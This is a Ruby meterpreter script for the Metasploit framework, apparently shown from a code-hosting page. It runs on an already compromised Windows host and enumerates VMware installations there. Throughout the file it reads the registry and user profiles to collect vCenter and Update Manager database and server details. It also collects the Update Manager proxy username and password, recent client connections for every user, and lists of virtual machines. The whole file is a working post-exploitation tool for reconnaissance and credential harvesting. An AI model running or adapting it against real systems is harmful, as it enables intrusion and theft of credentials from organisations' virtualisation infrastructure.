331 lines
13 KiB
Ruby
331 lines
13 KiB
Ruby
##
|
|
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
|
|
# If you'd like to imporve this script, please try to port it as a post
|
|
# module instead. Thank you.
|
|
##
|
|
|
|
|
|
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
|
|
#-------------------------------------------------------------------------------
|
|
################## Variable Declarations ##################
|
|
@client = client
|
|
|
|
opts = Rex::Parser::Arguments.new(
|
|
"-h" => [ false,"Help menu." ]
|
|
)
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
case opt
|
|
when "-h"
|
|
print_line("vmware_enum -- Enumerates VMware Configurations for VMware Products")
|
|
print_line("USAGE: run vmware_enum")
|
|
print_line(opts.usage)
|
|
raise Rex::Script::Completed
|
|
end
|
|
}
|
|
|
|
def check_prods()
|
|
key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\VMware, Inc.', KEY_READ)
|
|
sfmsvals = key.enum_key
|
|
print_status("The Following Products are installed on this host:")
|
|
sfmsvals.each do |p|
|
|
print_status("\t#{p}")
|
|
end
|
|
return sfmsvals
|
|
end
|
|
|
|
def check_vmsoft
|
|
installed = false
|
|
key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE', KEY_READ)
|
|
sfmsvals = key.enum_key
|
|
if sfmsvals.include?("VMware, Inc.")
|
|
print_status("VMware Products are Installed in Host")
|
|
installed = true
|
|
else
|
|
print_error("No VMware Products where found in this Host.")
|
|
end
|
|
key.close
|
|
return installed
|
|
end
|
|
|
|
def enum_vcenter
|
|
print_status("Information about Virtual Center:")
|
|
vc_dbuser = nil
|
|
vc_dbencpass = nil
|
|
vc_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","InstalledVersion")
|
|
vc_serial = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","Serial")
|
|
vc_dbinstance = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","DBInstanceName")
|
|
vc_dbtype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","DBServerType")
|
|
vc_tomcatver = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\Tomcat","Version")
|
|
vc_type = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","GroupType")
|
|
vc_odbcname = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","1")
|
|
vc_odbctype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","4")
|
|
# vc_odctrustcon = reg_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname}","TrustedConnection")
|
|
# print_line("*")
|
|
# if vc_odctrustcon.to_i != 1
|
|
# vc_dbuser = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","2")
|
|
# print_line("*")
|
|
# vc_dbencpass = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","3")
|
|
# print_line("*")
|
|
# end
|
|
vc_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname.chomp}","Database")
|
|
vc_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname.chomp}","Server")
|
|
print_status("\tVersion: #{vc_version}")
|
|
print_status("\tSerial: #{vc_serial}")
|
|
print_status("\tvCenter Type: #{vc_type}")
|
|
print_status("\tTomcat Version: #{vc_tomcatver}")
|
|
print_status("\tDatabase Instance: #{vc_dbinstance}")
|
|
print_status("\tDatabase Type: #{vc_dbtype}")
|
|
print_status("\tDatabase Name: #{vc_dbname}")
|
|
print_status("\tDatabase Server: #{vc_dbserver}")
|
|
print_status("\tODBC Name: #{vc_odbcname}")
|
|
print_status("\tODBC Type: #{vc_odbctype}")
|
|
# if vc_odctrustcon.to_i != 1
|
|
# print_status("\tODBC Username: #{vc_dbuser}")
|
|
# print_status("\tODBC Password: #{vc_dbencpass}")
|
|
# end
|
|
end
|
|
|
|
def enum_viclient
|
|
print_status("Information about VMware VI Client:")
|
|
vi_pluggins = nil
|
|
begin
|
|
vi_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\4.0","InstalledVersion")
|
|
vi_pluggins = registry_enumvals("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\Plugins")
|
|
rescue
|
|
end
|
|
print_status("\tVersion: #{vi_version}")
|
|
if vi_pluggins
|
|
vi_pluggins.each do |pi|
|
|
if pi=~ /Converter/
|
|
print_status("\tPlugin: VMware Converter")
|
|
elsif pi =~/UM/
|
|
print_status("\tPlugin: VMware Update Manager")
|
|
else
|
|
print_status("\tPlugin: #{pi}")
|
|
end
|
|
end
|
|
end
|
|
|
|
if not is_system?
|
|
recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
|
|
print_status("Recent VI Client Connections:")
|
|
recentconns.each do |c|
|
|
print_status("\t#{c}")
|
|
end
|
|
ignore_ssl = registry_enumkeys("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore")
|
|
if ignore_ssl.length > 0
|
|
print_status("\tIgnored SSL Certs for")
|
|
ignore_ssl.each do |issl|
|
|
ssl_key = registry_getvaldata("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
|
|
print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
|
|
end
|
|
|
|
end
|
|
else
|
|
user_sid = []
|
|
key = "HKU\\"
|
|
root_key, base_key = @client.sys.registry.splitkey(key)
|
|
open_key = @client.sys.registry.open_key(root_key, base_key)
|
|
keys = open_key.enum_key
|
|
keys.each do |k|
|
|
user_sid << k if k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/
|
|
end
|
|
user_sid.each do |us|
|
|
begin
|
|
enumed_user = registry_getvaldata("HKU\\#{us}\\Volatile Environment","USERNAME")
|
|
print_status("\tRecent VI Client Connections for #{enumed_user}:")
|
|
recentconns = registry_getvaldata("HKU\\#{us}\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
|
|
recentconns.each do |c|
|
|
print_status("\t#{c}")
|
|
end
|
|
ignore_ssl = registry_enumkeys("HKU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore")
|
|
if ignore_ssl.length > 0
|
|
print_status("\tIgnored SSL Certs for #{enumed_user}:")
|
|
ignore_ssl.each do |issl|
|
|
ssl_key = registry_getvaldata("HCU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
|
|
print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
|
|
end
|
|
|
|
end
|
|
rescue
|
|
print_status("\tUser appears to have not used the software.")
|
|
end
|
|
end
|
|
end
|
|
end
|
|
|
|
def enum_vum
|
|
print_status("Information about VMware Update Manager:")
|
|
begin
|
|
vum_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","InstalledVersion")
|
|
vum_server = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VUMServer")
|
|
vum_dbtype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","DBServerType")
|
|
vum_direct2web = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","DirectWebAccess")
|
|
vum_useproxy = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","UseProxy")
|
|
vum_proxyserver = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyServer")
|
|
vum_proxyport = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyPort")
|
|
vum_proxyuser = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyUserName")
|
|
vum_proxypass = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyPassword")
|
|
vum_vcentersrv = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VCServer")
|
|
vum_vcenterusr = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VCUserName")
|
|
vum_patchstore = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","PatchStore")
|
|
vum_odbcname = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","1")
|
|
vum_odbctype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","4")
|
|
vum_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","Database")
|
|
vum_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","Server")
|
|
# vum_trustedcon = reg_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","TrustedConnection")
|
|
# if vum_trustedcon.to_i != 1
|
|
# vum_odbcusename = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","2")
|
|
# vum_odbcpass = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","3")
|
|
# end
|
|
print_status("\tVersion: #{vum_version}")
|
|
print_status("\tServer: #{vum_server}")
|
|
print_status("\tPatch Store: #{vum_patchstore}")
|
|
print_status("\tDatabse Type: #{vum_dbtype}")
|
|
print_status("\tUses Proxy: #{vum_useproxy}")
|
|
print_status("\tProxy User: #{vum_proxyuser}")
|
|
print_status("\tProxy Password: #{vum_proxypass}")
|
|
print_status("\tVirtual Center: #{vum_vcentersrv}")
|
|
print_status("\tVirtual Center User: #{vum_vcenterusr}")
|
|
print_status("\tProxy Server: #{vum_proxyserver}:#{vum_proxyport}")
|
|
print_status("\tDatabase Name: #{vum_dbname}")
|
|
print_status("\tDatabase Server: #{vum_dbserver}")
|
|
print_status("\tODBC Name: #{vum_odbcname}")
|
|
print_status("\tODBC Type: #{vum_odbctype}")
|
|
# print_status("\t ODBC Trusted: #{vum_trustedcon}")
|
|
# if vum_trustedcon.to_i != 1
|
|
# print_status("\tODBC Username: #{vum_odbcusename}")
|
|
# print_status("\tODBC Password: #{vum_odbcpass}")
|
|
# end
|
|
rescue ::Exception => e
|
|
print_status("Error: #{e.class} #{e}")
|
|
end
|
|
|
|
end
|
|
|
|
def enum_vdm
|
|
print_status("Information about VMware VDM Broker:")
|
|
vdm_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VDM","ProductVersion")
|
|
print_status("\tVersion: #{vdm_version}")
|
|
end
|
|
|
|
def enum_powercli
|
|
print_status("Information about PowerCLI:")
|
|
pcli_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstalledVersion")
|
|
pcli_install_path = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstallPath")
|
|
begin
|
|
pcli_poweshell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\WindowsPowerShell","ExecutionPolicy")
|
|
rescue
|
|
pcli_poweshell_policy = "Restricted"
|
|
end
|
|
print_status("\tVersion: #{pcli_version}")
|
|
print_status("\tInstalled Pat: #{pcli_install_path}")
|
|
print_status("\tPowershell Execution Policy: #{pcli_poweshell_policy}")
|
|
end
|
|
|
|
#Function to enumerate the users if running as SYSTEM
|
|
def enum_users
|
|
os = @client.sys.config.sysinfo['OS']
|
|
users = []
|
|
path4users = ""
|
|
sysdrv = @client.sys.config.getenv('SystemDrive')
|
|
|
|
if os =~ /7|Vista|2008/
|
|
path4users = sysdrv + "\\users\\"
|
|
profilepath = "\\AppData\\Local\\VMware\\"
|
|
else
|
|
path4users = sysdrv + "\\Documents and Settings\\"
|
|
profilepath = "\\Application Data\\VMware\\"
|
|
end
|
|
|
|
if @client.sys.config.is_system?
|
|
print_status("Running as SYSTEM extracting user list..")
|
|
@client.fs.dir.foreach(path4users) do |u|
|
|
userinfo = {}
|
|
next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
|
|
userinfo['username'] = u
|
|
userinfo['userappdata'] = path4users + u + profilepath
|
|
users << userinfo
|
|
end
|
|
else
|
|
userinfo = {}
|
|
uservar = @client.sys.config.getenv('USERNAME')
|
|
userinfo['username'] = uservar
|
|
userinfo['userappdata'] = path4users + uservar + profilepath
|
|
users << userinfo
|
|
end
|
|
return users
|
|
end
|
|
def enum_vihosupdt
|
|
hosts = []
|
|
print_status("Information about VMware vSphere Host Update Utility:")
|
|
enum_users.each do |u|
|
|
print_status("\tESX/ESXi Hosts added for Updates for user #{u['username']}:")
|
|
begin
|
|
@client.fs.dir.foreach(u['userappdata']+"VIU\\hosts\\") do |vmdir|
|
|
next if vmdir =~ /^(\.|\.\.)$/
|
|
print_status("\t#{vmdir}")
|
|
end
|
|
rescue
|
|
end
|
|
end
|
|
end
|
|
|
|
def enum_vmwarewrk
|
|
config = ""
|
|
name = ""
|
|
print_status("Enumerating VMware Workstation VM's:")
|
|
fav_file = ""
|
|
enum_users.each do |u|
|
|
print_status("\tVM's for user #{u['username']}:")
|
|
path = u['userappdata'].gsub(/Local/,"Roaming")
|
|
account_file = @client.fs.file.new(path + "\\favorites.vmls", "rb")
|
|
until account_file.eof?
|
|
fav_file << account_file.read
|
|
end
|
|
end
|
|
fav_file.each_line do |l|
|
|
|
|
if l =~ /config/
|
|
print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
|
|
end
|
|
if l =~ /Name/
|
|
print_status("\tVM Name: #{l.scan(/vmlist\d*.DisplayName \= (\".*\")/)}")
|
|
print_status("")
|
|
end
|
|
end
|
|
end
|
|
if client.platform == 'windows'
|
|
if check_vmsoft
|
|
vmware_products = check_prods()
|
|
if vmware_products.include?("VMware VirtualCenter")
|
|
enum_vcenter
|
|
end
|
|
if vmware_products.include?("VMware Virtual Infrastructure Client")
|
|
enum_viclient
|
|
end
|
|
if vmware_products.include?("VMware Update Manager")
|
|
enum_vum
|
|
end
|
|
|
|
if vmware_products.include?("VMware VDM")
|
|
enum_vdm
|
|
end
|
|
if vmware_products.include?("VMware vSphere PowerCLI")
|
|
enum_powercli
|
|
end
|
|
if vmware_products.include?("VMware vSphere Host Update Utility 4.0")
|
|
enum_vihosupdt
|
|
end
|
|
if vmware_products.include?("VMware Workstation")
|
|
enum_vmwarewrk
|
|
end
|
|
else
|
|
print_status("No VMware Products appear to be installed in this host")
|
|
end
|
|
else
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
raise Rex::Script::Completed
|
|
end
|